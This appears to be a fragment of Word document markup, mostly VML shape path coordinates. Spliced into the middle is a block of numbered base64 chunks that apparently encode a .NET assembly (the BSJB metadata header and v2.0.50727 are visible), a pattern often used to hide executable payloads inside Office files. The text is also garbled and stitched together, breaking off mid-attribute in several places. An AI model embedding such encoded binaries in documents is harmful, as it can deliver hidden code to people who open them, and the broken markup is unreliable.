2897,14446,2900,14446,2902,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14446,2905,14447,2905,14447,2905,14447,2905,14447,2905,14447,2905,14447,2905,14447,2905,14447,2905,14447,2905,14448,2905,14448,2905,14448,2905,14448,2905,14449,2905,14449,2905,14449,2905,14450,2905,14450,2905,14450,2905,14451,2905,14451,2905,14452,2905,14452,2905,14453,2905,14453,2905,14454,2905,14455,2905,14455,2905,14456,2905,14457,2905,14457,2905,14458,2905,14459,2905,14460,2905,14461,2905,14462,2905,14463,2905,14464,2905,14465,2905,14466,2905,14468,2905,14469,2905,14470,2905,14471,2905,14473,2905,14474,2905,14476,2905,14477,2905,14479,2905,14481,2905,14482,2905,14484,2905,14486,2905,14488,2905,14490,2905,14492,2905,14494,2905,14496,2905,14498,2905,14500,2905,14503,2905,14505,2905,14508,2905,14510,2905,14513,2905,14515,2905,14518,2905,14521,2905,14524,2905,14527,2905,14530,2905,14533,2905,14536,2905,14539,2905,14543,2905,14546,2905,14549,2905,14553,2905,14557,2905,14560,2905,14564,2905,14568,2905,14572,2905,14576,2905,14580,2905,14584,2905,14589,2905,14593,2905,14598,2905,14602,2905,14607,2905,14612,2905,14617,2905,14622,2905,14627,2905,14632,2905,14637,2905,14642,2905,14648,2905,14653,2905,14659,2905,14665,2905,14671,2905,14677,2905,14683,2905,14689,2905,14695,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2905,14701,2904,14701,2904,14701,2904,14701,2904,14701,2904,14701,2904,14701,2904,14701,2903,14701,2903,14701,2903,14701,2903,14701,2902,14701,2902,14701,2902,14701,2902,14701,2901,14701,2901,14701,2901,14701,2900,14701,2900,14701,2899,14701,2899,14701,2899,14701,2898,14701,2898,14701,2897,14701,2897,14701,2896,14701,2895,14701,2895,14701,2894,14701,2894,14701,2893,14701,2892,14701,2892,14701,2891,14701,2890,14701,2889,14701,2888,14701,2888,14701,2887,14701,2886,14701,2885,14701,2884,14701,2883,14701,2882,14701,2881,14701,2880,14701,2879,14701,2878,14701,2877,14701,2875,14701,2874,14701,2873,14701,2872,14701,2870,14701,2869,14701,2868,14701,2866,14701,2865,14701,2863,14701,2862,14701,2860,14701,2859,14701,2857,14701,2855,14701,2854,14701,2852,14701,2850,14701,2848,14701,2846,14701,2844,14701,2842,14701,2840,14701,2838,14701,2836,14701,2834,14701,2832,14701,2830,14701,2828,14701,2825,14701,2823,14701,2821,14701,2818,14701,2816,14701,2813,14701,2811,14701,2808,14701,2805,14701,2803,14701,2800,14701,2797,14701,2794,14701,2791,14701,2788,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14701,2785,14700,2785,14700,2785,14700,2785,14700,2785,14700,2785,14699,2785,14699,2785,14699,2785,14698,2785,14698,2785,14698,2785,14697,2785,14697,2785,14696,2785,14696,2785,14695,2785,14695,2785,14694,2785,14694,2785,14693,2785,14692,2785,14692,2785,14691,2785,14690,2785,14689,2785,14689,2785,14688,2785,14687,2785,14686,2785,14685,2785,14684,2785,14682,2785,14681,2785,14680,2785,14679,2785,14678,2785,14676,2785,14675,2785,14673,2785,14672,2785,14670,2785,14669,2785,14667,2785,14665,2785,14664,2785,14662,2785,14660,2785,14658,2785,14656,2785,14654,2785,14652,2785,14649,2785,14647,2785,14645,2785,14643,2785,14640,2785,14638,2785,14635,2785,14632,2785,14630,2785,14627,2785,14624,2785,14621,2785,14618,2785,14615,2785,14612,2785,14608,2785,14605,2785,14602,2785,14598,2785,14595,2785,14591,2785,14587,2785,14584,2785,14580,2785,14576,2785,14572,2785,14567,2785,14563,2785,14559,2785,14555,2785,14550,2785,14545,2785,14541,2785,14536,2785,14531,2785,14526,2785,14521,2785,14516,2785,14511,2785,14505,2785,14500,2785,14494,2785,14489,2785,14483,2785,14477,2785,14471,2785,14465,2785,14459,2785,14453,2785,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:15050;width:130;height:270" coordorigin="2290,15050" coordsize="130,270" path="m2305,15077l2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2305,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2306,15077,2307,15077,2307,15077,2307,15077,2307,15077,2307,15077,2307,15077,2308,15077,2308,15077,2308,15077,2308,15077,2309,15077,2309,15077,2309,15077,2310,15077,2310,15077,2310,15077,2311,15077,2311,15077,2312,15077,2312,15077,2313,15077,2313,15077,2314,15077,2314,15077,2315,15077,2315,15077,2316,15077,2316,15077,2317,15077,2318,15077,2318,15077,2319,15077,2320,15077,2321,15077,2321,15077,2322,15077,2323,15077,2324,15077,2325,15077,2326,15077,2327,15077,2328,15077,2329,15077,2330,15077,2331,15077,2332,15077,2333,15077,2334,15077,2335,15077,2336,15077,2338,15077,2339,15077,2340,15077,2342,15077,2343,15077,2344,15077,2346,15077,2347,15077,2349,15077,2350,15077,2352,15077,2354,15077,2355,15077,2357,15077,2359,15077,2361,15077,2362,15077,2364,15077,2366,15077,2368,15077,2370,15077,2372,15077,2374,15077,2376,15077,2379,15077,2381,15077,2383,15077,2385,15077,2388,15077,2390,15077,2392,15077,2395,15077,2397,15077,2400,15077,2403,15077,2405,15077,2408,15077,2411,15077,2414,15077,2416,15077,2419,15077,2422,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15077,2425,15078,2425,15078,2425,15078,2425,15078,2425,15078,2425,15079,2425,15079,2425,15079,2425,15080,2425,15080,2425,15080,2425,15081,2425,15081,2425,15082,2425,15082,2425,15083,2425,15083,2425,15084,2425,15084,2425,15085,2425,15086,2425,15086,2425,15087,2425,15088,2425,15089,2425,15089,2425,15090,2425,15091,2425,15092,2425,15093,2425,15094,2425,15096,2425,15097,2425,15098,2425,15099,2425,15100,2425,15102,2425,15103,2425,15105,2425,15106,2425,15108,2425,15109,2425,15111,2425,15113,2425,15114,2425,15116,2425,15118,2425,15120,2425,15122,2425,15124,2425,15126,2425,15129,2425,15131,2425,15133,2425,15135,2425,15138,2425,15140,2425,15143,2425,15146,2425,15148,2425,15151,2425,15154,2425,15157,2425,15160,2425,15163,2425,15166,2425,15170,2425,15173,2425,15176,2425,15180,2425,15183,2425,15187,2425,15191,2425,15194,2425,15198,2425,15202,2425,15206,2425,15211,2425,15215,2425,15219,2425,15223,2425,15228,2425,15233,2425,15237,2425,15242,2425,15247,2425,15252,2425,15257,2425,15262,2425,15267,2425,15273,2425,15278,2425,15284,2425,15289,2425,15295,2425,15301,2425,15307,2425,15313,2425,15319,2425,15325,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2425,15332,2424,15332,2424,15332,2424,15332,2424,15332,2424,15332,2424,15332,2424,15332,2423,15332,2423,15332,2423,15332,2423,15332,2423,15332,2422,15332,2422,15332,2422,15332,2422,15332,2421,15332,2421,15332,2421,15332,2420,15332,2420,15332,2420,15332,2419,15332,2419,15332,2418,15332,2418,15332,2417,15332,2417,15332,2416,15332,2416,15332,2415,15332,2415,15332,2414,15332,2413,15332,2413,15332,2412,15332,2411,15332,2411,15332,2410,15332,2409,15332,2408,15332,2407,15332,2407,15332,2406,15332,2405,15332,2404,15332,2403,15332,2402,15332,2401,15332,2400,15332,2399,15332,2398,15332,2396,15332,2395,15332,2394,15332,2393,15332,2391,15332,2390,15332,2389,15332,2387,15332,2386,15332,2384,15332,2383,15332,2381,15332,2380,15332,2378,15332,2377,15332,2375,15332,2373,15332,2372,15332,2370,15332,2368,15332,2366,15332,2364,15332,2362,15332,2360,15332,2358,15332,2356,15332,2354,15332,2352,15332,2350,15332,2347,15332,2345,15332,2343,15332,2340,15332,2338,15332,2335,15332,2333,15332,2330,15332,2328,15332,2325,15332,2322,15332,2320,15332,2317,15332,2314,15332,2311,15332,2308,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15332,2305,15331,2305,15331,2305,15331,2305,15331,2305,15331,2305,15331,2305,15331,2305,15331,2305,15331,2305,15330,2305,15330,2305,15330,2305,15330,2305,15329,2305,15329,2305,15329,2305,15328,2305,15328,2305,15328,2305,15327,2305,15327,2305,15326,2305,15326,2305,15325,2305,15325,2305,15324,2305,15323,2305,15323,2305,15322,2305,15321,2305,15321,2305,15320,2305,15319,2305,15318,2305,15317,2305,15316,2305,15315,2305,15314,2305,15313,2305,15312,2305,15310,2305,15309,2305,15308,2305,15307,2305,15305,2305,15304,2305,15302,2305,15301,2305,15299,2305,15297,2305,15296,2305,15294,2305,15292,2305,15290,2305,15288,2305,15286,2305,15284,2305,15282,2305,15280,2305,15278,2305,15275,2305,15273,2305,15270,2305,15268,2305,15265,2305,15263,2305,15260,2305,15257,2305,15254,2305,15251,2305,15248,2305,15245,2305,15242,2305,15239,2305,15235,2305,15232,2305,15229,2305,15225,2305,15221,2305,15218,2305,15214,2305,15210,2305,15206,2305,15202,2305,15198,2305,15194,2305,15189,2305,15185,2305,15180,2305,15176,2305,15171,2305,15166,2305,15161,2305,15156,2305,15151,2305,15146,2305,15141,2305,15136,2305,15130,2305,15125,2305,15119,2305,15113,2305,15107,2305,15101,2305,15095,2305,15089,2305,15083,2305,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:15050;width:130;height:270" coordorigin="2770,15050" coordsize="130,270" path="m2785,15077l2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2786,15077,2787,15077,2787,15077,2787,15077,2787,15077,2787,15077,2787,15077,2788,15077,2788,15077,2788,15077,2788,15077,2788,15077,2789,15077,2789,15077,2789,15077,2790,15077,2790,15077,2790,15077,2791,15077,2791,15077,2791,15077,2792,15077,2792,15077,2793,15077,2793,15077,2794,15077,2794,15077,2795,15077,2795,15077,2796,15077,2797,15077,2797,15077,2798,15077,2799,15077,2799,15077,2800,15077,2801,15077,2802,15077,2802,15077,2803,15077,2804,15077,2805,15077,2806,15077,2807,15077,2808,15077,2809,15077,2810,15077,2811,15077,2812,15077,2813,15077,2814,15077,2815,15077,2817,15077,2818,15077,2819,15077,2821,15077,2822,15077,2823,15077,2825,15077,2826,15077,2828,15077,2829,15077,2831,15077,2832,15077,2834,15077,2836,15077,2837,15077,2839,15077,2841,15077,2843,15077,2845,15077,2846,15077,2848,15077,2850,15077,2852,15077,2855,15077,2857,15077,2859,15077,2861,15077,2863,15077,2866,15077,2868,15077,2870,15077,2873,15077,2875,15077,2878,15077,2880,15077,2883,15077,2885,15077,2888,15077,2891,15077,2894,15077,2897,15077,2900,15077,2902,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15077,2905,15078,2905,15078,2905,15078,2905,15078,2905,15078,2905,15079,2905,15079,2905,15079,2905,15080,2905,15080,2905,15080,2905,15081,2905,15081,2905,15082,2905,15082,2905,15083,2905,15083,2905,15084,2905,15084,2905,15085,2905,15086,2905,15086,2905,15087,2905,15088,2905,15089,2905,15089,2905,15090,2905,15091,2905,15092,2905,15093,2905,15094,2905,15096,2905,15097,2905,15098,2905,15099,2905,15100,2905,15102,2905,15103,2905,15105,2905,15106,2905,15108,2905,15109,2905,15111,2905,15113,2905,15114,2905,15116,2905,15118,2905,15120,2905,15122,2905,15124,2905,15126,2905,15129,2905,15131,2905,15133,2905,15135,2905,15138,2905,15140,2905,15143,2905,15146,2905,15148,2905,15151,2905,15154,2905,15157,2905,15160,2905,15163,2905,15166,2905,15170,2905,15173,2905,15176,2905,15180,2905,15183,2905,15187,2905,15191,2905,15194,2905,15198,2905,15202,2905,15206,2905,15211,2905,15215,2905,15219,2905,15223,2905,15228,2905,15233,2905,15237,2905,15242,2905,15247,2905,15252,2905,15257,2905,15262,2905,15267,2905,15273,2905,15278,2905,15284,2905,15289,2905,15295,2905,15301,2905,15307,2905,15313,2905,15319,2905,15325,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2905,15332,2904,15332,2904,15332,2904,15332,2904,15332,2904,15332,2904,15332,2904,15332,2903,15332,2903,15332,2903,15332,2903,15332,2902,15332,2902,15332,2902,15332,2902,15332,2901,15332,2901,15332,2901,15332,2900,15332,2900,15332,2899,15332,2899,15332,2899,15332,2898,15332,2898,15332,2897,15332,2897,15332,2896,15332,2895,15332,2895,15332,2894,15332,2894,15332,2893,15332,2892,15332,2892,15332,2891,15332,2890,15332,2889,15332,2888,15332,2888,15332,2887,15332,2886,15332,2885,15332,2884,15332,2883,15332,2882,15332,2881,15332,2880,15332,2879,15332,2878,15332,2877,15332,2875,15332,2874,15332,2873,15332,2872,15332,2870,15332,2869,15332,2868,15332,2866,15332,2865,15332,2863,15332,2862,15332,2860,15332,2859,15332,2857,15332,2855,15332,2854,15332,2852,15332,2850,15332,2848,15332,2846,15332,2844,15332,2842,15332,2840,15332,2838,15332,2836,15332,2834,15332,2832,15332,2830,15332,2828,15332,2825,15332,2823,15332,2821,15332,2818,15332,2816,15332,2813,15332,2811,15332,2808,15332,2805,15332,2803,15332,2800,15332,2797,15332,2794,15332,2791,15332,2788,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15331,2785,15331,2785,15331,2785,15331,2785,15331,2785,15331,2785,15331,2785,15331,2785,15331,2785,15330,2785,15330,2785,15330,2785,15330,2785,15329,2785,15329,2785,15329,2785,15328,2785,15328,2785,15328,2785,15327,2785,15327,2785,15326,2785,15326,2785,15325,2785,15325,2785,15324,2785,15323,2785,15323,2785,15322,2785,15321,2785,15321,2785,15320,2785,15319,2785,15318,2785,15317,2785,15316,2785,15315,2785,15314,2785,15313,2785,15312,2785,15310,2785,15309,2785,15308,2785,15307,2785,15305,2785,15304,2785,15302,2785,15301,2785,15299,2785,15297,2785,15296,2785,15294,2785,15292,2785,15290,2785,15288,2785,15286,2785,15284,2785,15282,2785,15280,2785,15278,2785,15275,2785,15273,2785,15270,2785,15268,2785,15265,2785,15263,2785,15260,2785,15257,2785,15254,2785,15251,2785,15248,2785,15245,2785,15242,2785,15239,2785,15235,2785,15232,2785,15229,2785,15225,2785,15221,2785,15218,2785,15214,2785,15210,2785,15206,2785,15202,2785,15198,2785,15194,2785,15189,2785,15185,2785,15180,2785,15176,2785,15171,2785,15166,2785,15161,2785,15156,2785,15151,2785,15146,2785,15141,2785,15136,2785,15130,2785,15125,2785,15119,2785,15113,2785,15107,2785,15101,2785,15095,2785,15089,2785,15083,2785,15077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86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64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"fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+F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QAAC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n07AAAEAigP"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65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"AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAA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AUAb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AAAACgHAAAj"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66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"fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHV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UlEA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AAATBEAANwB"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67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"AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAA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FAAA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AAJAAAAHwAA"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68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"ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAA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AAGA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FwFkgcGAMkF"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69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"kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGA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JUF4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QYGAMkE4QYG"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70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"AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIq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QYGA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FkHqQYGAL4I"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71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"qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQA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PgHA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AA9AAEACAAK"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72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"ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAAB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gcAA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D0AKgAJAAIB"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73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"AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGA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HQIP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wAGAOcDPwAG"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74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"AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAA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wFWg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FMCAwFWgPEB"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75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"AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWg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E0CA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wFWgDECAwFW"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76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"gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBA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wFWg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KgAAwFWgDoD"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77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"AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGA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KYD+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gAGAO8DPwAG"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78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"ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+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gAGA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OQE+gAGAC4I"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79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"+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWg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N4CD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gFWgO8ADgFW"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80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"gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAE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gFWg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FcAEgFWgNUA"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81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"EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWg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DkGE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gEAAAAAgACW"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82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"IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIP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wEVA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AAAAACAAJEg"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83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"1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGA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CAAj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CEAAAAAhhg+"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84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"BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAv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AgAA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AgAHAkBAAkA"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85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"BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAA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AIAf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QgAAAMAIQcA"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86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"AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAl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QgAA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AUAKAcAAAYA"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" 